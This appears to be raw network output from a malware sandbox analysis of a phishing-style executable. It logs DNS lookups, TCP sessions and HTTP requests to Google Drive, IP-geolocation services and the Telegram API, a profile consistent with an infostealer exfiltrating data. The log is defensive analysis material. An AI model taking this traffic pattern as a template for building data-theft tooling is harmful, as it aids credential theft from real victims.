                                                                                                                                Dec 9, 2024 08:33:35.486296892 CET49850443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:35.489897013 CET4984680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:35.491108894 CET4985680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:35.609467983 CET8049846132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:35.609641075 CET4984680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:35.610313892 CET8049856132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:35.610408068 CET4985680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:35.610646009 CET4985680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:35.729806900 CET8049856132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:36.913548946 CET8049856132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:36.915246010 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:36.915307999 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:36.915422916 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:36.915707111 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:36.915730000 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:36.955912113 CET4985680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:38.283449888 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:38.285353899 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:38.285367966 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:38.285450935 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:38.285459042 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:38.920592070 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:38.920711040 CET44349860149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:38.920778990 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:38.921374083 CET49860443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:38.924873114 CET4985680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:38.926065922 CET4986680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:39.045216084 CET8049856132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:39.045275927 CET4985680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:39.046549082 CET8049866132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:39.046654940 CET4986680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:39.046822071 CET4986680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:39.166029930 CET8049866132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:40.351454973 CET8049866132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:40.369079113 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:40.369131088 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:40.369203091 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:40.369894028 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:40.369905949 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:40.400701046 CET4986680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:41.731669903 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:41.733762980 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:41.733774900 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:41.733840942 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:41.733850956 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:42.432265043 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:42.432368994 CET44349870149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:42.432508945 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:42.433095932 CET49870443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:42.436796904 CET4986680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:42.437644958 CET4987680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:42.557682991 CET8049866132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:42.557847977 CET8049876132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:42.558010101 CET4986680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:42.558053017 CET4987680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:42.558346987 CET4987680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:42.902549028 CET8049876132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:43.866245031 CET8049876132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:43.916352034 CET4987680192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:33:46.170675993 CET49886443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:46.170716047 CET44349886149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:46.170816898 CET49886443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:46.171139956 CET49886443192.168.2.9149.154.167.220
                                                                                                                                Dec 9, 2024 08:33:46.171154022 CET44349886149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:47.534440041 CET44349886149.154.167.220192.168.2.9
                                                                                                                                Dec 9, 2024 08:33:47.588567019 CET49886443192.168.2.9149.154.167.220
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 9, 2024 08:32:31.700875044 CET5285653192.168.2.91.1.1.1
                                                                                                                                Dec 9, 2024 08:32:31.840909004 CET53528561.1.1.1192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:34.496165037 CET6259853192.168.2.91.1.1.1
                                                                                                                                Dec 9, 2024 08:32:34.635406971 CET53625981.1.1.1192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:41.275645971 CET6497853192.168.2.91.1.1.1
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET53649781.1.1.1192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:43.540227890 CET5849853192.168.2.91.1.1.1
                                                                                                                                Dec 9, 2024 08:32:43.678113937 CET53584981.1.1.1192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:51.096159935 CET5288653192.168.2.91.1.1.1
                                                                                                                                Dec 9, 2024 08:32:51.233118057 CET53528861.1.1.1192.168.2.9
                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 9, 2024 08:32:31.700875044 CET192.168.2.91.1.1.10xfe53Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:34.496165037 CET192.168.2.91.1.1.10x6cdcStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.275645971 CET192.168.2.91.1.1.10xbaedStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:43.540227890 CET192.168.2.91.1.1.10x9c64Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:51.096159935 CET192.168.2.91.1.1.10x7a4cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 9, 2024 08:32:31.840909004 CET1.1.1.1192.168.2.90xfe53No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:34.635406971 CET1.1.1.1192.168.2.90x6cdcNo error (0)drive.usercontent.google.com142.250.181.33A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET1.1.1.1192.168.2.90xbaedNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET1.1.1.1192.168.2.90xbaedNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET1.1.1.1192.168.2.90xbaedNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET1.1.1.1192.168.2.90xbaedNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET1.1.1.1192.168.2.90xbaedNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:41.413285017 CET1.1.1.1192.168.2.90xbaedNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:43.678113937 CET1.1.1.1192.168.2.90x9c64No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:43.678113937 CET1.1.1.1192.168.2.90x9c64No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                Dec 9, 2024 08:32:51.233118057 CET1.1.1.1192.168.2.90x7a4cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                • drive.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • api.telegram.org
                                                                                                                                • checkip.dyndns.org
                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.949714132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:32:41.539978027 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:32:42.848786116 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:42 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 536bb45a0d44d0a1154429c8691ae142
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                Dec 9, 2024 08:32:42.854034901 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 9, 2024 08:32:43.277419090 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:43 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 83ad9aa7538ce1d1793f6a0e8835be84
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                Dec 9, 2024 08:32:50.665574074 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 9, 2024 08:32:51.090795040 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:50 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: cd424cd25fcce15451c03d8d5c6a5c2d
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.949737132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:32:53.570131063 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Dec 9, 2024 08:32:54.890522003 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:54 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 8f0c9213ab02ffbaa8e0c3a9b7e6f1f5
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.949744132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:32:57.008755922 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:32:58.349574089 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:58 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b6db8f8f04a0af592d0297a4297f266b
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.949756132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:00.646945953 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:01.955497980 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:01 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 2f873c9716efbf31da1a95c08b83b9d5
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.949764132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:04.223192930 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:05.541635990 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:05 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 107941b1b0ee068cddcf78b335ed1811
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.949775132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:07.778630018 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:09.081372976 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:08 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 631684a5e53e6033c5edd099fc335d37
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.949787132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:11.395179033 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:12.699516058 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:12 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: ea2db69dd64190044963be3023c6a6f0
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.949795132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:14.960570097 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:16.268881083 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:16 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 7b2a6fc2e22d3615f41a488b00fa2c48
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.949806132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:18.398494005 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:19.703084946 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:19 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 125517fe7d4c289fb1744b2a8971491f
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.949816132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:21.853198051 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:23.155771971 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:22 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 5fbb15c76dd702cb3bc2f0e31049d0b7
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.949826132.226.247.73802556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 9, 2024 08:33:25.270713091 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Dec 9, 2024 08:33:26.574084997 CET321INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 104
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: e9114c89a0f52a3037b1d5e7f3bb90cf
